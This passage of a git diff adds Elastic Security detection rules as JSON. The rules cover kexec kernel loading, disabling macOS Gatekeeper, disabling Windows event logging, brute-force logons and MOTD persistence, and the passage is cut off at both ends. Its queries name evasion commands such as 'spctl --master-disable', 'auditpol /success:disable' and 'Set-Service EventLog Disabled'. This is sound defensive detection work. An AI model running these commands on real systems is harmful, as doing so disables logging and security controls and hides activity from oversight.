Threat Detection", + "Tactic: Discovery", + "Tactic: Collection", + "Tactic: Execution", + "Resources: Investigation Guide", + "Data Source: PowerShell Logs" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0007", + "name": "Discovery", + "reference": "https://attack.mitre.org/tactics/TA0007/" + }, + "technique": [ + { + "id": "T1135", + "name": "Network Share Discovery", + "reference": "https://attack.mitre.org/techniques/T1135/" + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1059", + "name": "Command and Scripting Interpreter", + "reference": "https://attack.mitre.org/techniques/T1059/", + "subtechnique": [ + { + "id": "T1059.001", + "name": "PowerShell", + "reference": "https://attack.mitre.org/techniques/T1059/001/" + } + ] + }, + { + "id": "T1106", + "name": "Native API", + "reference": "https://attack.mitre.org/techniques/T1106/" + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0009", + "name": "Collection", + "reference": "https://attack.mitre.org/tactics/TA0009/" + }, + "technique": [ + { + "id": "T1039", + "name": "Data from Network Shared Drive", + "reference": "https://attack.mitre.org/techniques/T1039/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "query", + "version": 9 + }, + "id": "4c59cff1-b78a-41b8-a9f1-4231984d1fb6_9", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/4d4c35f4-414e-4d0c-bb7e-6db7c80a6957_6.json b/packages/security_detection_engine/kibana/security_rule/4d4c35f4-414e-4d0c-bb7e-6db7c80a6957_6.json new file mode 100644 index 00000000000..ffaaca8c9bd --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/4d4c35f4-414e-4d0c-bb7e-6db7c80a6957_6.json @@ -0,0 +1,142 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "This detection rule identifies the usage of kexec, helping to uncover unauthorized kernel replacements and potential compromise of the system's integrity. Kexec is a Linux feature that enables the loading and execution of a different kernel without going through the typical boot process. Malicious actors can abuse kexec to bypass security measures, escalate privileges, establish persistence or hide their activities by loading a malicious kernel, enabling them to tamper with the system's trusted state, allowing e.g. a VM Escape.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*", + "endgame-*", + "auditbeat-*", + "logs-auditd_manager.auditd-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Kernel Load or Unload via Kexec Detected", + "query": "process where host.os.type == \"linux\" and event.type == \"start\" and event.action in (\"exec\", \"exec_event\", \"executed\", \"process_started\")\n and process.name == \"kexec\" and process.args in (\"--exec\", \"-e\", \"--load\", \"-l\", \"--unload\", \"-u\")\n", + "references": [ + "https://www.crowdstrike.com/blog/venom-vulnerability-details/", + "https://www.makeuseof.com/what-is-venom-vulnerability/", + "https://madaidans-insecurities.github.io/guides/linux-hardening.html" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "auditd_manager", + "version": "^1.0.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "4d4c35f4-414e-4d0c-bb7e-6db7c80a6957", + "setup": "## Setup\n\nThis rule requires data coming in from Elastic Defend.\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either \"Traditional Endpoints\" or \"Cloud Workloads\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Tactic: Privilege Escalation", + "Tactic: Defense Evasion", + "Data Source: Elastic Defend", + "Data Source: Elastic Endgame", + "Data Source: Auditd Manager" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0004", + "name": "Privilege Escalation", + "reference": "https://attack.mitre.org/tactics/TA0004/" + }, + "technique": [ + { + "id": "T1611", + "name": "Escape to Host", + "reference": "https://attack.mitre.org/techniques/T1611/" + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [ + { + "id": "T1547", + "name": "Boot or Logon Autostart Execution", + "reference": "https://attack.mitre.org/techniques/T1547/", + "subtechnique": [ + { + "id": "T1547.006", + "name": "Kernel Modules and Extensions", + "reference": "https://attack.mitre.org/techniques/T1547/006/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1601", + "name": "Modify System Image", + "reference": "https://attack.mitre.org/techniques/T1601/", + "subtechnique": [ + { + "id": "T1601.001", + "name": "Patch System Image", + "reference": "https://attack.mitre.org/techniques/T1601/001/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 6 + }, + "id": "4d4c35f4-414e-4d0c-bb7e-6db7c80a6957_6", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/4da13d6e-904f-4636-81d8-6ab14b4e6ae9_106.json b/packages/security_detection_engine/kibana/security_rule/4da13d6e-904f-4636-81d8-6ab14b4e6ae9_106.json new file mode 100644 index 00000000000..be7b0b176f9 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/4da13d6e-904f-4636-81d8-6ab14b4e6ae9_106.json @@ -0,0 +1,81 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Detects attempts to disable Gatekeeper on macOS. Gatekeeper is a security feature that's designed to ensure that only trusted software is run. Adversaries may attempt to disable Gatekeeper before executing malicious code.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "Attempt to Disable Gatekeeper", + "query": "event.category:process and host.os.type:macos and event.type:(start or process_started) and\n process.args:(spctl and \"--master-disable\")\n", + "references": [ + "https://support.apple.com/en-us/HT202491", + "https://community.carbonblack.com/t5/Threat-Advisories-Documents/TAU-TIN-Shlayer-OSX/ta-p/68397" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "4da13d6e-904f-4636-81d8-6ab14b4e6ae9", + "setup": "## Setup\n\nThis rule requires data coming in from Elastic Defend.\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a macOS System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, for MacOS it is recommended to select \"Traditional Endpoints\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/current/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: macOS", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1553", + "name": "Subvert Trust Controls", + "reference": "https://attack.mitre.org/techniques/T1553/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "query", + "version": 106 + }, + "id": "4da13d6e-904f-4636-81d8-6ab14b4e6ae9_106", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/4de76544-f0e5-486a-8f84-eae0b6063cdc_111.json b/packages/security_detection_engine/kibana/security_rule/4de76544-f0e5-486a-8f84-eae0b6063cdc_111.json new file mode 100644 index 00000000000..27fbe89f929 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/4de76544-f0e5-486a-8f84-eae0b6063cdc_111.json @@ -0,0 +1,127 @@ +{ + "attributes": { + "author": [ + "Elastic", + "Ivan Ninichuck", + "Austin Songer" + ], + "description": "Identifies attempts to disable EventLog via the logman Windows utility, PowerShell, or auditpol. This is often done by attackers in an attempt to evade detection on a system.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.*", + "logs-windows.*", + "endgame-*", + "logs-system.security*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Disable Windows Event and Security Logs Using Built-in Tools", + "note": "## Triage and analysis\n\n### Investigating Disable Windows Event and Security Logs Using Built-in Tools\n\nWindows event logs are a fundamental data source for security monitoring, forensics, and incident response. Adversaries can tamper, clear, and delete this data to break SIEM detections, cover their tracks, and slow down incident response.\n\nThis rule looks for the usage of different utilities to disable the EventLog service or specific event logs.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Contact the account owner and confirm whether they are aware of this activity.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n - Verify if any other anti-forensics behaviors were observed.\n- Investigate the event logs prior to the action for suspicious behaviors that an attacker may be trying to cover up.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- Re-enable affected logging components, services, and security monitoring.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n(\n ((process.name:\"logman.exe\" or ?process.pe.original_file_name == \"Logman.exe\") and\n process.args : \"EventLog-*\" and process.args : (\"stop\", \"delete\")) or\n\n ((process.name : (\"pwsh.exe\", \"powershell.exe\", \"powershell_ise.exe\") or ?process.pe.original_file_name in\n (\"pwsh.exe\", \"powershell.exe\", \"powershell_ise.exe\")) and\n\tprocess.args : \"Set-Service\" and process.args: \"EventLog\" and process.args : \"Disabled\") or\n\n ((process.name:\"auditpol.exe\" or ?process.pe.original_file_name == \"AUDITPOL.EXE\") and process.args : \"/success:disable\")\n)\n", + "references": [ + "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/logman", + "https://medium.com/palantir/tampering-with-windows-event-tracing-background-offense-and-defense-4be7ac62ac63" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + }, + { + "package": "system", + "version": "^1.6.4" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.pe.original_file_name", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "4de76544-f0e5-486a-8f84-eae0b6063cdc", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "low", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Resources: Investigation Guide", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1070", + "name": "Indicator Removal", + "reference": "https://attack.mitre.org/techniques/T1070/", + "subtechnique": [ + { + "id": "T1070.001", + "name": "Clear Windows Event Logs", + "reference": "https://attack.mitre.org/techniques/T1070/001/" + } + ] + }, + { + "id": "T1562", + "name": "Impair Defenses", + "reference": "https://attack.mitre.org/techniques/T1562/", + "subtechnique": [ + { + "id": "T1562.002", + "name": "Disable Windows Event Logging", + "reference": "https://attack.mitre.org/techniques/T1562/002/" + }, + { + "id": "T1562.006", + "name": "Indicator Blocking", + "reference": "https://attack.mitre.org/techniques/T1562/006/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 111 + }, + "id": "4de76544-f0e5-486a-8f84-eae0b6063cdc_111", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/4de76544-f0e5-486a-8f84-eae0b6063cdc_112.json b/packages/security_detection_engine/kibana/security_rule/4de76544-f0e5-486a-8f84-eae0b6063cdc_112.json new file mode 100644 index 00000000000..dd58aa1d86d --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/4de76544-f0e5-486a-8f84-eae0b6063cdc_112.json @@ -0,0 +1,127 @@ +{ + "attributes": { + "author": [ + "Elastic", + "Ivan Ninichuck", + "Austin Songer" + ], + "description": "Identifies attempts to disable EventLog via the logman Windows utility, PowerShell, or auditpol. This is often done by attackers in an attempt to evade detection on a system.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.process-*", + "logs-windows.*", + "endgame-*", + "logs-system.security*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Disable Windows Event and Security Logs Using Built-in Tools", + "note": "## Triage and analysis\n\n### Investigating Disable Windows Event and Security Logs Using Built-in Tools\n\nWindows event logs are a fundamental data source for security monitoring, forensics, and incident response. Adversaries can tamper, clear, and delete this data to break SIEM detections, cover their tracks, and slow down incident response.\n\nThis rule looks for the usage of different utilities to disable the EventLog service or specific event logs.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Contact the account owner and confirm whether they are aware of this activity.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n - Verify if any other anti-forensics behaviors were observed.\n- Investigate the event logs prior to the action for suspicious behaviors that an attacker may be trying to cover up.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- Re-enable affected logging components, services, and security monitoring.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n(\n ((process.name:\"logman.exe\" or ?process.pe.original_file_name == \"Logman.exe\") and\n process.args : \"EventLog-*\" and process.args : (\"stop\", \"delete\")) or\n\n ((process.name : (\"pwsh.exe\", \"powershell.exe\", \"powershell_ise.exe\") or ?process.pe.original_file_name in\n (\"pwsh.exe\", \"powershell.exe\", \"powershell_ise.exe\")) and\n\tprocess.args : \"Set-Service\" and process.args: \"EventLog\" and process.args : \"Disabled\") or\n\n ((process.name:\"auditpol.exe\" or ?process.pe.original_file_name == \"AUDITPOL.EXE\") and process.args : \"/success:disable\")\n)\n", + "references": [ + "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/logman", + "https://medium.com/palantir/tampering-with-windows-event-tracing-background-offense-and-defense-4be7ac62ac63" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + }, + { + "package": "system", + "version": "^1.6.4" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.pe.original_file_name", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "4de76544-f0e5-486a-8f84-eae0b6063cdc", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "low", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Resources: Investigation Guide", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1070", + "name": "Indicator Removal", + "reference": "https://attack.mitre.org/techniques/T1070/", + "subtechnique": [ + { + "id": "T1070.001", + "name": "Clear Windows Event Logs", + "reference": "https://attack.mitre.org/techniques/T1070/001/" + } + ] + }, + { + "id": "T1562", + "name": "Impair Defenses", + "reference": "https://attack.mitre.org/techniques/T1562/", + "subtechnique": [ + { + "id": "T1562.002", + "name": "Disable Windows Event Logging", + "reference": "https://attack.mitre.org/techniques/T1562/002/" + }, + { + "id": "T1562.006", + "name": "Indicator Blocking", + "reference": "https://attack.mitre.org/techniques/T1562/006/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 112 + }, + "id": "4de76544-f0e5-486a-8f84-eae0b6063cdc_112", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/4e85dc8a-3e41-40d8-bc28-91af7ac6cf60_10.json b/packages/security_detection_engine/kibana/security_rule/4e85dc8a-3e41-40d8-bc28-91af7ac6cf60_10.json new file mode 100644 index 00000000000..8e017e793de --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/4e85dc8a-3e41-40d8-bc28-91af7ac6cf60_10.json @@ -0,0 +1,123 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies multiple logon failures followed by a successful one from the same source address. Adversaries will often brute force login attempts across multiple users with a common or known password, in an attempt to gain access to accounts.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-system.security*", + "logs-windows.forwarded*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Multiple Logon Failure Followed by Logon Success", + "note": "## Triage and analysis\n\n### Investigating Multiple Logon Failure Followed by Logon Success\n\nAdversaries with no prior knowledge of legitimate credentials within the system or environment may guess passwords to attempt access to accounts. Without knowledge of the password for an account, an adversary may opt to guess the password using a repetitive or iterative mechanism systematically. More details can be found [here](https://attack.mitre.org/techniques/T1110/001/).\n\nThis rule identifies potential password guessing/brute force activity from a single address, followed by a successful logon, indicating that an attacker potentially successfully compromised the account.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the logon failure reason code and the targeted user name.\n - Prioritize the investigation if the account is critical or has administrative privileges over the domain.\n- Investigate the source IP address of the failed Network Logon attempts.\n - Identify whether these attempts are coming from the internet or are internal.\n- Investigate other alerts associated with the involved users and source host during the past 48 hours.\n- Identify the source and the target computer and their roles in the IT environment.\n- Check whether the involved credentials are used in automation or scheduled tasks.\n- If this activity is suspicious, contact the account owner and confirm whether they are aware of it.\n- Examine the source host for derived artifacts that indicate compromise:\n - Observe and collect information about the following activities in the alert source host:\n - Attempts to contact external domains and addresses.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the host which is the source of this activity.\n\n### False positive analysis\n\n- Authentication misconfiguration or obsolete credentials.\n- Service account password expired.\n- Domain trust relationship issues.\n- Infrastructure or availability issues.\n\n### Related rules\n\n- Multiple Logon Failure from the same Source Address - 48b6edfc-079d-4907-b43c-baffa243270d\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the source host to prevent further post-compromise behavior.\n- If the asset is exposed to the internet with RDP or other remote services available, take the necessary measures to restrict access to the asset. If not possible, limit the access via the firewall to only the needed IP addresses. Also, ensure the system uses robust authentication mechanisms and is patched regularly.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "sequence by winlog.computer_name, source.ip with maxspan=5s\n [authentication where event.action == \"logon-failed\" and\n /* event 4625 need to be logged */\n winlog.logon.type : \"Network\" and user.id != null and \n source.ip != null and source.ip != \"127.0.0.1\" and source.ip != \"::1\" and \n not winlog.event_data.TargetUserSid : \"S-1-0-0\" and not user.id : \"S-1-0-0\" and \n not user.name : (\"ANONYMOUS LOGON\", \"-\", \"*$\") and not user.domain == \"NT AUTHORITY\" and\n\n /* noisy failure status codes often associated to authentication misconfiguration */\n not winlog.event_data.Status : (\"0xC000015B\", \"0XC000005E\", \"0XC0000133\", \"0XC0000192\")] with runs=5\n [authentication where event.action == \"logged-in\" and\n /* event 4624 need to be logged */\n winlog.logon.type : \"Network\" and\n source.ip != null and source.ip != \"127.0.0.1\" and source.ip != \"::1\" and\n not user.name : (\"ANONYMOUS LOGON\", \"-\", \"*$\") and not user.domain == \"NT AUTHORITY\"]\n", + "references": [ + "https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4625" + ], + "related_integrations": [ + { + "package": "system", + "version": "^1.6.4" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "source.ip", + "type": "ip" + }, + { + "ecs": true, + "name": "user.domain", + "type": "keyword" + }, + { + "ecs": true, + "name": "user.id", + "type": "keyword" + }, + { + "ecs": true, + "name": "user.name", + "type": "keyword" + }, + { + "ecs": false, + "name": "winlog.computer_name", + "type": "keyword" + }, + { + "ecs": false, + "name": "winlog.event_data.Status", + "type": "keyword" + }, + { + "ecs": false, + "name": "winlog.event_data.TargetUserSid", + "type": "keyword" + }, + { + "ecs": false, + "name": "winlog.logon.type", + "type": "unknown" + } + ], + "risk_score": 47, + "rule_id": "4e85dc8a-3e41-40d8-bc28-91af7ac6cf60", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Credential Access", + "Resources: Investigation Guide" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0006", + "name": "Credential Access", + "reference": "https://attack.mitre.org/tactics/TA0006/" + }, + "technique": [ + { + "id": "T1110", + "name": "Brute Force", + "reference": "https://attack.mitre.org/techniques/T1110/", + "subtechnique": [ + { + "id": "T1110.001", + "name": "Password Guessing", + "reference": "https://attack.mitre.org/techniques/T1110/001/" + }, + { + "id": "T1110.003", + "name": "Password Spraying", + "reference": "https://attack.mitre.org/techniques/T1110/003/" + } + ] + } + ] + } + ], + "type": "eql", + "version": 10 + }, + "id": "4e85dc8a-3e41-40d8-bc28-91af7ac6cf60_10", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/4ec47004-b34a-42e6-8003-376a123ea447_8.json b/packages/security_detection_engine/kibana/security_rule/4ec47004-b34a-42e6-8003-376a123ea447_8.json new file mode 100644 index 00000000000..44aba506413 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/4ec47004-b34a-42e6-8003-376a123ea447_8.json @@ -0,0 +1,104 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Message of the day (MOTD) is the message that is presented to the user when a user connects to a Linux server via SSH or a serial connection. Linux systems contain several default MOTD files located in the \"/etc/update-motd.d/\" and \"/usr/lib/update-notifier/\" directories. These scripts run as the root user every time a user connects over SSH or a serial connection. Adversaries may create malicious MOTD files that grant them persistence onto the target every time a user connects to the system by executing a backdoor script or command. This rule detects the execution of potentially malicious processes through the MOTD utility.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*", + "endgame-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Suspicious Process Spawned from MOTD Detected", + "note": "## Triage and analysis\n\n### Investigating Suspicious Process Spawned from MOTD Detected\n\nThe message-of-the-day (MOTD) is used to display a customizable system-wide message or information to users upon login in Linux.\n\nAttackers can abuse message-of-the-day (motd) files to run scripts, commands or malicious software every time a user connects to a system over SSH or a serial connection, by creating a new file within the `/etc/update-motd.d/` or `/usr/lib/update-notifier/` directory. Files in these 